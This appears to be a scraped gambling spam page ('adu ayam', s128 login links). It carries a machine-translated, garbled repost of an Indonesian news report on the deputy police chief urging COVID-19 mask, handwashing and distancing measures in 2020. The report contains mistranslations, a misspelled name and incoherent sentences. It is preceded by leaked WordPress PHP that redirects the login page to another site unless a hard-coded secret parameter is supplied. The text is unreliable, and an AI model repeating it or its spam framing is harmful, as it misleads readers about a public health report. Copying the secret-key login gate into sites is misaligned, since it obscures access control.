//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Wakil Kapolri: Ingat bahwa 3M akan memulihkan kesehatan dan Indonesia akan memulihkan kesehatan | adu ayam bali_s128.net login_s128.live

Wakil Kapolri: Ingat bahwa 3M akan memulihkan kesehatan dan Indonesia akan memulihkan kesehatan

Laporan Glery Lazuardi / Tribunnews.com-Jakarta TRIBUNNEWS.COM-Wakil Kepala Kepolisian Republik Indonesia (Wakapolri) Komjen Gatot Eddy Pramono yang juga merupakan Wakil Direktur Jenderal Komite Penanganan COVID ke-19 dan Pemulihan Ekonomi ke-19 (PCPEN) mengimbau kepada masyarakat untuk terus menjaga Waspada dan jangan remehkan penyebaran virus corona di Indonesia.

Oleh karena itu, dalam rangka meningkatkan kesadaran dan kedisiplinan masyarakat terhadap pelaksanaan kesepakatan kesehatan, Komjen Gatot mengimbau masyarakat untuk mengubah gaya hidup dan menggalakkan gaya hidup sehat untuk mencegah penyebaran virus corona.

Salah satu tanggapan Wakil Kapolri RI adalah dengan memakai topeng dan selalu buka usaha dengan mengenang motto topeng 3M, cuci tangan dan jaga jarak.

Baca: Riset terbaru mendorong pemakaian masker saat disiram untuk mencegah virus corona

“Saat ini memakai masker sudah menjadi mode. Pakai masker dan lari 3M, kita bisa lakukan” “Kita lindungi Diri dan lingkungan sehingga Indonesia bisa sehat dan sehat. “Perekonomian akan pulih. Komjen Gatot kepada wartawan, Jumat (21/8/2020).

Selain itu, Komjen Gatot menambahkan selain mengimbau masyarakat untuk melaksanakan rencana 3M, pemerintah juga akan memperkuat 3T melalui panitia PCPEN dan pemangku kepentingan terkait. , Memungkinkan masyarakat untuk melakukan aktivitas dengan nyaman dan aman, serta berkontribusi pada pembangunan ekonomi yang telah terhalang oleh pandemi Covid-19.

“Pengujian, pelacakan dan pengobatan akan ditingkatkan, serta kebijaksanaan. Ini dapat dengan cepat mendeteksi, mengobati, dan menyembuhkan pandemi ini. Guna memulihkan kesehatan, Indonesia akan meningkatkan kesehatan, “ujarnya.” Ingat, memakai masker adalah cara hidup, “kata Komjan Gato Eddie Pramon. Covid-19 Populer.

Panitia PCPEN diketuai oleh Menteri Badan Usaha Milik Negara Erick Thohir dan diketuai oleh dua orang wakil kepala eksekutif yaitu, Kepala Staf Angkatan Darat (KSAD) Jenderal Andika Perkasa (Andika) Perkasa) menjabat sebagai wakil ketua, saya direktur jenderal pertama dan wakil kepala polisi Komjen Gatot Eddy Pramono, dan saya menjabat sebagai wakil direktur jenderal kedua.

Leave a comment

adu ayam bali_s128.net login_s128.live